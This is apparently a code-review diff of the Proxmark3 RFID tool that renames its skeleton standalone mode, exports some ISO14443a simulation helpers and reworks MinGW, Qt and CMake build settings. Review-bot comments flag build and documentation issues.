slots_count = sizeof(low) / sizeof(low[0]); slots_count = ARRAYLEN(low);
bba = BigBuf_get_addr(); bba = BigBuf_get_addr();
for (;;) { for (;;) {
WDT_HIT(); WDT_HIT();

View file

@ -129,7 +129,7 @@ void RunMod() {
// 2 - simulate tag from selected slot // 2 - simulate tag from selected slot
// 3 - write to T5555 tag // 3 - write to T5555 tag
uint8_t state = 0; uint8_t state = 0;
slots_count = sizeof(low) / sizeof(low[0]); slots_count = ARRAYLEN(low);
bba = BigBuf_get_addr(); bba = BigBuf_get_addr();
LED_Slot(selected); LED_Slot(selected);
for (;;) { for (;;) {

View file

@ -5,7 +5,7 @@
// at your option, any later version. See the LICENSE.txt file for the text of // at your option, any later version. See the LICENSE.txt file for the text of
// the license. // the license.
//----------------------------------------------------------------------------- //-----------------------------------------------------------------------------
// main code for skeleton aka IceRun by Iceman // main code for skeleton by Iceman
//----------------------------------------------------------------------------- //-----------------------------------------------------------------------------
#include "standalone.h" // standalone definitions #include "standalone.h" // standalone definitions
#include "proxmark3_arm.h" #include "proxmark3_arm.h"
@ -15,19 +15,19 @@
#include "dbprint.h" #include "dbprint.h"
void ModInfo(void) { void ModInfo(void) {
DbpString(" LF skeleton mode - aka IceRun (iceman)"); DbpString(" LF skeleton mode - aka Skeleton (iceman)");
} }
void RunMod() { void RunMod() {
StandAloneMode(); StandAloneMode();
Dbprintf("[=] LF skeleton code a.k.a IceRun started"); Dbprintf("[=] LF skeleton code a.k.a Skeleton started");
FpgaDownloadAndGo(FPGA_BITSTREAM_LF); FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
// the main loop for your standalone mode // the main loop for your standalone mode
for (;;) { for (;;) {
WDT_HIT(); WDT_HIT();
// exit from IceRun, send a usbcommand. // exit from RunMod, send a usbcommand.
if (data_available()) break; if (data_available()) break;
// Was our button held down or pressed? // Was our button held down or pressed?
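Review bot: After the rename, the strings in `ModInfo` and `RunMod` read "LF skeleton mode - aka Skeleton (iceman)" and "LF skeleton code a.k.a Skeleton started", which repeat the same name on both sides of "aka". Drop the alias and keep just "LF skeleton mode (iceman)" and "LF skeleton code started".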

View file

@ -3,7 +3,7 @@
This contains functionality for different StandAlone modes. The fullimage will be built given the correct compiler flags used. Build targets for these files are contained in `Makefile.inc` and `Makefile.hal` This contains functionality for different StandAlone modes. The fullimage will be built given the correct compiler flags used. Build targets for these files are contained in `Makefile.inc` and `Makefile.hal`
If you want to implement a new standalone mode, you need to implement the methods provided in `standalone.h`. If you want to implement a new standalone mode, you need to implement the methods provided in `standalone.h`.
Have a look at the skeleton standalone mode called IceRun, in the files `lf_icerun.c lf_icerun.h`. Have a look at the skeleton standalone mode, in the file `lf_skeleton.c`.
As it is now, you can only have one standalone mode installed at the time. As it is now, you can only have one standalone mode installed at the time.
@ -58,7 +58,7 @@ This leads to your next step, your DEFINE name needed in Makefile.
## Update MAKEFILE.HAL ## Update MAKEFILE.HAL
Add your mode to the `Makefile.hal` help and modes list: Add your mode to the `Makefile.hal` help and modes list (alphabetically):
``` ```
+==========================================================+ +==========================================================+
| STANDALONE | DESCRIPTION | | STANDALONE | DESCRIPTION |
@ -68,24 +68,24 @@ Add your mode to the `Makefile.hal` help and modes list:
| LF_FOO | My foobar mode will make you coffee | | LF_FOO | My foobar mode will make you coffee |
+----------------------------------------------------------+ +----------------------------------------------------------+
STANDALONE_MODES := LF_SAMYRUN LF_ICERUN LF_PROXBRUTE LF_HIDBRUTE LF_FOO STANDALONE_MODES := LF_... LF_FOO
STANDALONE_MODES += HF_YOUNG HF_MATTYRUN HF_COLIN HF_BOG STANDALONE_MODES += HF_...
``` ```
If your mode is using one of the unique features of the RDV4, add it to the proper list: If your mode is using one of the unique features of the RDV4, add it to the proper list:
``` ```
STANDALONE_MODES_REQ_SMARTCARD := STANDALONE_MODES_REQ_SMARTCARD :=
STANDALONE_MODES_REQ_FLASH := HF_COLIN HF_BOG STANDALONE_MODES_REQ_FLASH :=
``` ```
## Update MAKEFILE.INC ## Update MAKEFILE.INC
Add your source code files like the following sample in the `Makefile.inc` Add your source code files like the following sample in the `Makefile.inc`
``` ```
# WITH_STANDALONE_LF_ICERUN # WITH_STANDALONE_LF_SKELETON
ifneq (,$(findstring WITH_STANDALONE_LF_ICERUN,$(APP_CFLAGS))) ifneq (,$(findstring WITH_STANDALONE_LF_SKELETON,$(APP_CFLAGS)))
SRC_STANDALONE = lf_icerun.c SRC_STANDALONE = lf_skeleton.c
endif endif
# WITH_STANDALONE_LF_FOO # WITH_STANDALONE_LF_FOO
@ -140,4 +140,13 @@ The final steps is to
When compiling you will see a header showing what configurations your project compiled with. When compiling you will see a header showing what configurations your project compiled with.
Make sure it says your standalone mode name. Make sure it says your standalone mode name.
## Submitting your code
Once you're ready to share your mode, please
* add a line in CHANGELOG.md
* add your mode in the modes table in doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md
and submit your PR.
Happy hacking! Happy hacking!

View file

@ -837,7 +837,7 @@ static void Code4bitAnswerAsTag(uint8_t cmd) {
// stop when button is pressed or client usb connection resets // stop when button is pressed or client usb connection resets
// or return TRUE when command is captured // or return TRUE when command is captured
//----------------------------------------------------------------------------- //-----------------------------------------------------------------------------
static bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len) { bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len) {
// Set FPGA mode to "simulated ISO 14443 tag", no modulation (listen // Set FPGA mode to "simulated ISO 14443 tag", no modulation (listen
// only, since we are receiving, not transmitting). // only, since we are receiving, not transmitting).
// Signal field is off with the appropriate LED // Signal field is off with the appropriate LED
@ -873,7 +873,7 @@ static bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *
return false; return false;
} }
static bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size) { bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size) {
// Example response, answer to MIFARE Classic read block will be 16 bytes + 2 CRC = 18 bytes // Example response, answer to MIFARE Classic read block will be 16 bytes + 2 CRC = 18 bytes
// This will need the following byte array for a modulation sequence // This will need the following byte array for a modulation sequence
// 144 data bits (18 * 8) // 144 data bits (18 * 8)
@ -919,7 +919,7 @@ bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_
} }
} }
static bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages) { bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages) {
uint8_t sak = 0; uint8_t sak = 0;
// The first response contains the ATQA (note: bytes are transmitted in reverse order). // The first response contains the ATQA (note: bytes are transmitted in reverse order).
static uint8_t rATQA[2] = { 0x00 }; static uint8_t rATQA[2] = { 0x00 };

View file

@ -112,6 +112,8 @@ RAMFUNC int ManchesterDecoding(uint8_t bit, uint16_t offset, uint32_t non_real_t
void RAMFUNC SniffIso14443a(uint8_t param); void RAMFUNC SniffIso14443a(uint8_t param);
void SimulateIso14443aTag(uint8_t tagType, uint8_t flags, uint8_t *data); void SimulateIso14443aTag(uint8_t tagType, uint8_t flags, uint8_t *data);
bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages);
bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len);
void iso14443a_antifuzz(uint32_t flags); void iso14443a_antifuzz(uint32_t flags);
void ReaderIso14443a(PacketCommandNG *c); void ReaderIso14443a(PacketCommandNG *c);
void ReaderTransmit(uint8_t *frame, uint16_t len, uint32_t *timing); void ReaderTransmit(uint8_t *frame, uint16_t len, uint32_t *timing);
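Review bot: The two prototypes added here turn formerly file-local helpers into part of the header's interface, and nothing documents their contract. `GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len)` writes into caller-supplied buffers but has no capacity argument, so a standalone mode calling it has nothing in the header stating how large `received` and `par` must be. Please add a comment with the required buffer sizes (or a size parameter). For `SimulateIso14443aInit`, please state who owns the `responses` array it hands back through `tag_response_info_t **responses`.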
@ -136,6 +138,7 @@ int EmSendCmdParEx(uint8_t *resp, uint16_t respLen, uint8_t *par, bool collision
int EmSendPrecompiledCmd(tag_response_info_t *p_response); int EmSendPrecompiledCmd(tag_response_info_t *p_response);
bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_t **buffer, size_t *max_buffer_size); bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_t **buffer, size_t *max_buffer_size);
bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size);
bool EmLogTrace(uint8_t *reader_data, uint16_t reader_len, uint32_t reader_StartTime, uint32_t reader_EndTime, uint8_t *reader_Parity, bool EmLogTrace(uint8_t *reader_data, uint16_t reader_len, uint32_t reader_StartTime, uint32_t reader_EndTime, uint8_t *reader_Parity,
uint8_t *tag_data, uint16_t tag_len, uint32_t tag_StartTime, uint32_t tag_EndTime, uint8_t *tag_Parity); uint8_t *tag_data, uint16_t tag_len, uint32_t tag_StartTime, uint32_t tag_EndTime, uint8_t *tag_Parity);

View file

@ -1,3 +1,10 @@
# MINGW:
# On ProxSpace 3.4:
# cmake -G"MSYS Makefiles" ..
# On Proxspace 3.3 or less, you need to install cmake:
# pacman -S mingw-w64-x86_64-cmake
# /mingw64/bin/cmake -G"MSYS Makefiles" ..
cmake_minimum_required(VERSION 3.10) cmake_minimum_required(VERSION 3.10)
project(proxmark3) project(proxmark3)
@ -5,8 +12,6 @@ if(CMAKE_VERSION VERSION_LESS "3.7.0")
set(CMAKE_INCLUDE_CURRENT_DIR ON) set(CMAKE_INCLUDE_CURRENT_DIR ON)
endif() endif()
set(CMAKE_CXX_STANDARD 14)
if(APPLE AND EXISTS /usr/local/opt/qt5) if(APPLE AND EXISTS /usr/local/opt/qt5)
# Homebrew installs Qt5 (up to at least 5.11.0) in # Homebrew installs Qt5 (up to at least 5.11.0) in
# /usr/local/qt5. Ensure that it can be found by CMake # /usr/local/qt5. Ensure that it can be found by CMake
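Review bot: Dropping `set(CMAKE_CXX_STANDARD 14)` leaves the CMake build with no C++ dialect selected. The client Makefile in this same commit keeps `-std=c++11` for the Qt5 case and adds a comment that Qt5 on OSX fails when no standard is given. Please confirm the CMake Qt5 build still compiles on macOS with the compiler default. Otherwise, keep a standard pinned on the target (`set_property(TARGET proxmark3 PROPERTY CXX_STANDARD 11)` or similar) so both build systems behave the same.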
@ -32,29 +37,6 @@ endforeach()
SET (CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_CURRENT_SOURCE_DIR}/cmake") SET (CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_CURRENT_SOURCE_DIR}/cmake")
INCLUDE(FindSSE)
if(NOT SSE2_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE2 on this machine.")
endif(NOT SSE2_FOUND)
if(NOT SSE3_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE3 on this machine.")
endif(NOT SSE3_FOUND)
if(NOT SSSE3_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSSE3 on this machine.")
endif(NOT SSSE3_FOUND)
if(NOT SSE4_1_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE4.1 on this machine.")
endif(NOT SSE4_1_FOUND)
if(NOT AVX_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX on this machine.")
endif(NOT AVX_FOUND)
if(NOT AVX2_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX2 on this machine.")
endif(NOT AVX2_FOUND)
if(NOT AVX512_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX512 on this machine.")
endif(NOT AVX512_FOUND)
add_subdirectory(deps) add_subdirectory(deps)
set (TARGET_SOURCES set (TARGET_SOURCES
@ -207,10 +189,6 @@ if (APPLE)
set(ADDITIONAL_LNK "-framework Foundation" "-framework AppKit") set(ADDITIONAL_LNK "-framework Foundation" "-framework AppKit")
endif (APPLE) endif (APPLE)
if (MINGW)
set(CMAKE_CXX_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_CXX_FLAGS}")
endif (MINGW)
if (Qt5_FOUND) if (Qt5_FOUND)
message("Qt5 library found, building gui :)") message("Qt5 library found, building gui :)")
set(CMAKE_AUTOMOC ON) set(CMAKE_AUTOMOC ON)
@ -238,6 +216,17 @@ add_executable(
target_compile_options(proxmark3 PUBLIC -Wall -Werror -O3) target_compile_options(proxmark3 PUBLIC -Wall -Werror -O3)
if (MINGW)
# Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
# and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
# FTR __USE_MINGW_ANSI_STDIO seems deprecated in Mingw32
# but not Mingw64 https://fr.osdn.net/projects/mingw/lists/archive/users/2019-January/000199.html
target_compile_definitions(proxmark3 PRIVATE _ISOC99_SOURCE)
set(CMAKE_C_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_C_FLAGS}")
set(CMAKE_CXX_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_CXX_FLAGS}")
endif (MINGW)
target_include_directories(proxmark3 PRIVATE target_include_directories(proxmark3 PRIVATE
../common ../common
../common_fpga ../common_fpga
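Review bot: In the new `if (MINGW)` block, `CMAKE_C_FLAGS` and `CMAKE_CXX_FLAGS` are set after `add_subdirectory(deps)` has already run (that call is in the earlier hunk of this file). A subdirectory scope receives its copy of these variables when `add_subdirectory` is called, so the libraries under `deps` will not be built with `-mno-ms-bitfields -fexec-charset=cp850`. `_ISOC99_SOURCE` is likewise attached to `proxmark3` only. Since `-mno-ms-bitfields` changes struct layout, mixing objects built with and without it is worth avoiding. Either move the block above `add_subdirectory(deps)`, or apply the options per target with `target_compile_options` on every target that needs them.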

View file

@ -57,11 +57,16 @@ LIBS = -I$(LUALIBPATH) -I$(MBEDTLSLIBPATH) -I$(JANSSONLIBPATH) -I$(CBORLIBPATH)
INCLUDES_CLIENT = -I./src -I../include -I../common -I../common_fpga $(LIBS) INCLUDES_CLIENT = -I./src -I../include -I../common -I../common_fpga $(LIBS)
CFLAGS ?= -Wall -Werror -O3 CFLAGS ?= -Wall -Werror -O3
# We cannot just use CFLAGS+=... because it has impact on sub-makes if CFLAGS is defined in env: # We cannot just use CFLAGS+=... because it has impact on sub-makes if CFLAGS is defined in env:
PM3CFLAGS = $(CFLAGS) -std=c99 -D_ISOC99_SOURCE $(INCLUDES_CLIENT) PM3CFLAGS = $(CFLAGS) $(INCLUDES_CLIENT)
# WIP Testing # WIP Testing
#PM3CFLAGS = $(CFLAGS) -std=c11 -pedantic $(INCLUDES_CLIENT) #PM3CFLAGS = $(CFLAGS) -std=c11 -pedantic $(INCLUDES_CLIENT)
PREFIX ?= /usr/local PREFIX ?= /usr/local
ifneq (,$(findstring MINGW,$(platform))) ifneq (,$(findstring MINGW,$(platform)))
# Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
# and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
# FTR __USE_MINGW_ANSI_STDIO seems deprecated in Mingw32
# but not Mingw64 https://fr.osdn.net/projects/mingw/lists/archive/users/2019-January/000199.html
PM3CFLAGS += -D_ISOC99_SOURCE
PM3CFLAGS += -mno-ms-bitfields -fexec-charset=cp850 PM3CFLAGS += -mno-ms-bitfields -fexec-charset=cp850
endif endif
CXXFLAGS ?= -Wall -Werror -O3 CXXFLAGS ?= -Wall -Werror -O3
@ -77,6 +82,8 @@ else
LDFLAGS += -framework Foundation -framework AppKit LDFLAGS += -framework Foundation -framework AppKit
LDLIBS := -L/usr/local/opt/readline/lib $(LDLIBS) LDLIBS := -L/usr/local/opt/readline/lib $(LDLIBS)
LIBS := -I/usr/local/opt/readline/include $(LIBS) LIBS := -I/usr/local/opt/readline/include $(LIBS)
# cf brew info qt: qt not symlinked anymore
PKG_CONFIG_PATH := PKG_CONFIG_PATH=/usr/local/opt/qt/lib/pkgconfig
else else
LUALIB += -ldl LUALIB += -ldl
LUAPLATFORM = linux LUAPLATFORM = linux
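Review bot: `PKG_CONFIG_PATH := PKG_CONFIG_PATH=/usr/local/opt/qt/lib/pkgconfig` reuses the name of a well-known environment variable for a make variable that holds a shell assignment prefix. Two consequences follow. First, any `PKG_CONFIG_PATH` the user exported is replaced rather than extended, and the Homebrew prefix is hard-coded to `/usr/local`. Second, if the variable came in from the environment, make exports the new value to child processes, so sub-makes will see the literal string `PKG_CONFIG_PATH=/usr/local/...` as the path. Please give the make variable a distinct name (for example `PKG_CONFIG_ENV`) and prepend to the existing value instead of overwriting it.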
@ -85,18 +92,19 @@ endif
ifneq ($(SKIPQT),1) ifneq ($(SKIPQT),1)
# Check for correctly configured Qt5 # Check for correctly configured Qt5
QTINCLUDES = $(shell pkg-config --cflags Qt5Core Qt5Widgets 2>/dev/null) QTINCLUDES = $(shell $(PKG_CONFIG_PATH) pkg-config --cflags Qt5Core Qt5Widgets 2>/dev/null)
QTLDLIBS = $(shell pkg-config --libs Qt5Core Qt5Widgets 2>/dev/null) QTLDLIBS = $(shell $(PKG_CONFIG_PATH) pkg-config --libs Qt5Core Qt5Widgets 2>/dev/null)
MOC = $(shell pkg-config --variable=host_bins Qt5Core)/moc MOC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=host_bins Qt5Core)/moc
UIC = $(shell pkg-config --variable=host_bins Qt5Core)/uic UIC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=host_bins Qt5Core)/uic
ifeq ($(QTINCLUDES), ) ifeq ($(QTINCLUDES), )
# if Qt5 not found check for correctly configured Qt4 # if Qt5 not found check for correctly configured Qt4
QTINCLUDES = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) QTINCLUDES = $(shell $(PKG_CONFIG_PATH) pkg-config --cflags QtCore QtGui 2>/dev/null)
QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null) QTLDLIBS = $(shell $(PKG_CONFIG_PATH) pkg-config --libs QtCore QtGui 2>/dev/null)
MOC = $(shell pkg-config --variable=moc_location QtCore) MOC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=moc_location QtCore)
UIC = $(shell pkg-config --variable=uic_location QtCore) UIC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=uic_location QtCore)
else else
PM3CXXFLAGS += -std=c++11 -fPIC # On OSX Qt5 is claiming for a C++11 compiler (gnu++14 works too, but if nothing it fails)
PM3CXXFLAGS += -fPIC -std=c++11
endif endif
ifeq ($(QTINCLUDES), ) ifeq ($(QTINCLUDES), )
# if both pkg-config commands failed, search in common places # if both pkg-config commands failed, search in common places
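Review bot: Every `$(shell $(PKG_CONFIG_PATH) pkg-config ...)` call here expands a variable that is assigned only in the macOS branch of the previous hunk. On the other platforms, make falls back to the environment variable of the same name, so a user with `PKG_CONFIG_PATH=/some/dir` exported ends up running `/some/dir pkg-config --cflags ...`. That command fails, the error is hidden by `2>/dev/null`, and Qt is silently reported as missing. Renaming the make variable so it cannot collide with the environment (and leaving it empty by default) removes the problem.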
@ -106,7 +114,7 @@ ifneq ($(SKIPQT),1)
ifneq ($(wildcard $(QTDIR)/include/QtWidgets),) ifneq ($(wildcard $(QTDIR)/include/QtWidgets),)
QTINCLUDES += -I$(QTDIR)/include/QtWidgets QTINCLUDES += -I$(QTDIR)/include/QtWidgets
QTLDLIBS = -L$(QTDIR)/lib -lQt5Widgets -lQt5Gui -lQt5Core QTLDLIBS = -L$(QTDIR)/lib -lQt5Widgets -lQt5Gui -lQt5Core
PM3CXXFLAGS += -std=c++11 -fPIC PM3CXXFLAGS += -fPIC -std=c++11
endif endif
MOC = $(QTDIR)/bin/moc MOC = $(QTDIR)/bin/moc
UIC = $(QTDIR)/bin/uic UIC = $(QTDIR)/bin/uic

View file

@ -1,168 +0,0 @@
# Check if SSE/AVX instructions are available on the machine where
# the project is compiled.
IF(CMAKE_SYSTEM_NAME MATCHES "Linux")
EXEC_PROGRAM(cat ARGS "/proc/cpuinfo" OUTPUT_VARIABLE CPUINFO)
STRING(REGEX REPLACE "^.*(sse2).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "sse2" "${SSE_THERE}" SSE2_TRUE)
IF (SSE2_TRUE)
set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
ELSE (SSE2_TRUE)
set(SSE2_FOUND false CACHE BOOL "SSE2 available on host")
ENDIF (SSE2_TRUE)
# /proc/cpuinfo apparently omits sse3 :(
STRING(REGEX REPLACE "^.*[^s](sse3).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "sse3" "${SSE_THERE}" SSE3_TRUE)
IF (NOT SSE3_TRUE)
STRING(REGEX REPLACE "^.*(T2300).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "T2300" "${SSE_THERE}" SSE3_TRUE)
ENDIF (NOT SSE3_TRUE)
STRING(REGEX REPLACE "^.*(ssse3).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "ssse3" "${SSE_THERE}" SSSE3_TRUE)
IF (SSE3_TRUE OR SSSE3_TRUE)
set(SSE3_FOUND true CACHE BOOL "SSE3 available on host")
ELSE (SSE3_TRUE OR SSSE3_TRUE)
set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
ENDIF (SSE3_TRUE OR SSSE3_TRUE)
IF (SSSE3_TRUE)
set(SSSE3_FOUND true CACHE BOOL "SSSE3 available on host")
ELSE (SSSE3_TRUE)
set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
ENDIF (SSSE3_TRUE)
STRING(REGEX REPLACE "^.*(sse4_1).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "sse4_1" "${SSE_THERE}" SSE41_TRUE)
IF (SSE41_TRUE)
set(SSE4_1_FOUND true CACHE BOOL "SSE4.1 available on host")
ELSE (SSE41_TRUE)
set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
ENDIF (SSE41_TRUE)
STRING(REGEX REPLACE "^.*(avx).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "avx" "${SSE_THERE}" AVX_TRUE)
IF (AVX_TRUE)
set(AVX_FOUND true CACHE BOOL "AVX available on host")
ELSE (AVX_TRUE)
set(AVX_FOUND false CACHE BOOL "AVX available on host")
ENDIF (AVX_TRUE)
STRING(REGEX REPLACE "^.*(avx2).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "avx2" "${SSE_THERE}" AVX2_TRUE)
IF (AVX2_TRUE)
set(AVX2_FOUND true CACHE BOOL "AVX2 available on host")
ELSE (AVX2_TRUE)
set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
ENDIF (AVX2_TRUE)
STRING(REGEX REPLACE "^.*(avx512).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "avx512" "${SSE_THERE}" AVX2_TRUE)
IF (AVX512_TRUE)
set(AVX512_FOUND true CACHE BOOL "AVX512 available on host")
ELSE (AVX2_TRUE)
set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
ENDIF (AVX512_TRUE)
ELSEIF(CMAKE_SYSTEM_NAME MATCHES "Darwin")
EXEC_PROGRAM("/usr/sbin/sysctl -n machdep.cpu.features" OUTPUT_VARIABLE
CPUINFO)
STRING(REGEX REPLACE "^.*[^S](SSE2).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "SSE2" "${SSE_THERE}" SSE2_TRUE)
IF (SSE2_TRUE)
set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
ELSE (SSE2_TRUE)
set(SSE2_FOUND false CACHE BOOL "SSE2 available on host")
ENDIF (SSE2_TRUE)
STRING(REGEX REPLACE "^.*[^S](SSE3).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "SSE3" "${SSE_THERE}" SSE3_TRUE)
IF (SSE3_TRUE)
set(SSE3_FOUND true CACHE BOOL "SSE3 available on host")
ELSE (SSE3_TRUE)
set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
ENDIF (SSE3_TRUE)
STRING(REGEX REPLACE "^.*(SSSE3).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "SSSE3" "${SSE_THERE}" SSSE3_TRUE)
IF (SSSE3_TRUE)
set(SSSE3_FOUND true CACHE BOOL "SSSE3 available on host")
ELSE (SSSE3_TRUE)
set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
ENDIF (SSSE3_TRUE)
STRING(REGEX REPLACE "^.*(SSE4.1).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "SSE4.1" "${SSE_THERE}" SSE41_TRUE)
IF (SSE41_TRUE)
set(SSE4_1_FOUND true CACHE BOOL "SSE4.1 available on host")
ELSE (SSE41_TRUE)
set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
ENDIF (SSE41_TRUE)
STRING(REGEX REPLACE "^.*(AVX).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "AVX" "${SSE_THERE}" AVX_TRUE)
IF (AVX_TRUE)
set(AVX_FOUND true CACHE BOOL "AVX available on host")
ELSE (AVX_TRUE)
set(AVX_FOUND false CACHE BOOL "AVX available on host")
ENDIF (AVX_TRUE)
STRING(REGEX REPLACE "^.*(AVX2).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "AVX2" "${SSE_THERE}" AVX2_TRUE)
IF (AVX2_TRUE)
set(AVX2_FOUND true CACHE BOOL "AVX2 available on host")
ELSE (AVX2_TRUE)
set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
ENDIF (AVX2_TRUE)
STRING(REGEX REPLACE "^.*(AVX512).*$" "\\1" SSE_THERE ${CPUINFO})
STRING(COMPARE EQUAL "AVX512" "${SSE_THERE}" AVX2_TRUE)
IF (AVX2_TRUE)
set(AVX2_FOUND true CACHE BOOL "AVX512 available on host")
ELSE (AVX2_TRUE)
set(AVX2_FOUND false CACHE BOOL "AVX512 available on host")
ENDIF (AVX2_TRUE)
ELSEIF(CMAKE_SYSTEM_NAME MATCHES "Windows")
# TODO
set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
set(AVX_FOUND false CACHE BOOL "AVX available on host")
set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
ELSE(CMAKE_SYSTEM_NAME MATCHES "Linux")
set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
set(AVX_FOUND false CACHE BOOL "AVX available on host")
set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
ENDIF(CMAKE_SYSTEM_NAME MATCHES "Linux")
if(NOT SSE2_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE2 on this machine.")
endif(NOT SSE2_FOUND)
if(NOT SSE3_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE3 on this machine.")
endif(NOT SSE3_FOUND)
if(NOT SSSE3_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSSE3 on this machine.")
endif(NOT SSSE3_FOUND)
if(NOT SSE4_1_FOUND)
MESSAGE(STATUS "Could not find hardware support for SSE4.1 on this machine.")
endif(NOT SSE4_1_FOUND)
if(NOT AVX_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX on this machine.")
endif(NOT AVX_FOUND)
if(NOT AVX2_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX2 on this machine.")
endif(NOT AVX2_FOUND)
if(NOT AVX512_FOUND)
MESSAGE(STATUS "Could not find hardware support for AVX512 on this machine.")
endif(NOT AVX512_FOUND)
mark_as_advanced(SSE2_FOUND SSE3_FOUND SSSE3_FOUND SSE4_1_FOUND, AVX_FOUND, AVX2_FOUND)

View file

@ -5,8 +5,6 @@
#amiitool.c $(MYSRCS) ../../../../common/../../commonutil.c ../ui.c -lreadline -lm ../../../../common/mbedtls/libmbedtls.a \ #amiitool.c $(MYSRCS) ../../../../common/../../commonutil.c ../ui.c -lreadline -lm ../../../../common/mbedtls/libmbedtls.a \
#-o amiitool #-o amiitool
set_property(SOURCE PROPERTY C_STANDARD 99)
add_library(amiibo STATIC add_library(amiibo STATIC
amiitool/amiibo.c amiitool/amiibo.c
amiitool/drbg.c amiitool/drbg.c

View file

@ -1,6 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I. -I.. -I../jansson -I../../../common -I../../../include MYINCLUDES = -I. -I.. -I../jansson -I../../../common -I../../../include
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
MYSRCS = \ MYSRCS = \
amiibo.c \ amiibo.c \

View file

@ -1,6 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I../../../common -I../../../include -I../../src MYINCLUDES = -I../../../common -I../../../include -I../../src
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
MYSRCS = \ MYSRCS = \
argtable3.c \ argtable3.c \

View file

@ -1,22 +1,23 @@
